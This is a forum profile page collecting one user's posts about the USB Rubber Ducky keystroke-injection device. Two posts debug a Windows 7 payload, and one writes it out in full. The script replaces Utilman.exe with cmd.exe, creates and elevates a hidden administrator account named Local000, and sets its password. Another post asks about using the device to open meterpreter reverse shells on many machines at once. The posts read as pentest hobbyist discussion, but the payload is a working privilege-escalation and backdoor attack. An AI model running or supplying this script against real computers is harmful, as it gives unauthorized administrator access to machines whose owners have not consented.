
mackwage

Active Members
  • Posts: 17
  • Days Won: 1

Everything posted by mackwage

  1. I apologize if this seems like a dumb question. I am seeking to understand the benefit in having the duck emulate other USB devices. Would it execute the malicious script any differently?
  2. Refer to title. With the current reverse shell, there would be no way to handle pwning several boxes at once, as netcat cannot juggle multiple connections. I was trying to think whether, during a physical pentest, you could use the ducky on every PC in sight to set up a meterpreter session back to your computer so you have a shell on all of them at once. Thoughts?
  3. In Windows, installing Java doesn't put it in your system32 folder so you have to refer to the Java folder for the Java.exe. Or at least that's how it is on both of my Windows machines.
  4. Thanks for the tip on the default delay. I am using Win7 Ultimate x64. I manually walked through every step of the script and typed the commands in CMD to view their behavior.

     icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T

     This command didn't actually seem to change the permissions unless adding the "/grant administrators:F /T". I did some Google searching on the command to understand more how it works, which led to me adding the last part.

     STRING xcopy cmd.exe util\

     I changed the syntax and added a backslash at the end. Without the backslash at the end, xcopy will prompt and ask if it's a file or a directory.

     STRING cd /util
     STRING ren cmd.exe Utilman.exe
     STRING cd ..

     I had trouble getting the rename command to interact correctly with the file unless that file was in my working directory.

     STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\

     I couldn't get xcopy to successfully copy from the util folder to the parent directory. I tried all sorts of variations and kept getting errors. So I just used the absolute path name instead.

     STRING rmdir /s /q util

     Without the /q trigger, rmdir will prompt you asking if you are sure you wish to delete it. I'm also looking for the correct icacls command to change Utilman.exe back to the default permissions at the end of the script. Pwning the machine or not, I'd hate to leave it vulnerable for someone else to play with. :P
  5. Minus the above thing, I had to change the syntax of some of the commands to get it to work on Windows 7, specifically the icacls, ren, and rmdir commands. As it was, it would prompt for an answer to the ren and rmdir commands, so I added the trigger to suppress those. Also, I had to change the icacls syntax to allow full control of Utilman.exe. Then I added a short delay after each GUI command.

     DELAY 200
     GUI r
     DELAY 50
     STRING cmd
     DELAY 50
     ENTER
     DELAY 50
     STRING takeown /f "%systemroot%\System32\Utilman.exe"
     ENTER
     DELAY 50
     STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T
     ENTER
     DELAY 50
     STRING cd %systemroot%\System32
     ENTER
     DELAY 50
     STRING mkdir util
     ENTER
     STRING xcopy cmd.exe util\
     ENTER
     DELAY 50
     STRING ren Utilman.exe Utilman.exe.bak
     ENTER
     DELAY 50
     STRING cd /util
     ENTER
     DELAY 50
     STRING ren cmd.exe Utilman.exe
     ENTER
     DELAY 50
     STRING cd ..
     ENTER
     DELAY 50
     STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\
     ENTER
     DELAY 50
     STRING rmdir /s /q util
     ENTER
     DELAY 50
     STRING exit
     ENTER
     DELAY 50
     GUI u
     STRING net user Local000 /add
     ENTER
     DELAY 50
     STRING net localgroup administrators Local000 /add
     ENTER
     DELAY 50
     STRING exit
     ENTER
     DELAY 50
     GUI r
     STRING cmd
     ENTER
     DELAY 50
     STRING cd "%systemroot%\System32"
     ENTER
     DELAY 50
     STRING delete Utilman.exe
     ENTER
     DELAY 50
     STRING y
     ENTER
     DELAY 50
     STRING ren Utilman.exe.bak Utilman.exe
     ENTER
     DELAY 50
     STRING exit
     ENTER
     GUI r
     DELAY 500
     STRING cmd
     DELAY 500
     ENTER
     DELAY 200
     STRING net user Local000 *
     ENTER
     STRING hak5
     ENTER
     STRING hak5
     ENTER
     STRING exit
     ENTER
  6. I think it's the actual behavior of Windows. If you manually hit the Windows key, type cmd, then hit Shift+F10, it does the same behavior.
  7. I seem to have issues with the payload as is. The issue seems to be with the lines below:

     MENU
     STRING a
     ENTER

     I assume this is to right-click on the CMD exe and run as administrator. However, it seems to right-click within the text box of the start menu. Does anyone else have this issue?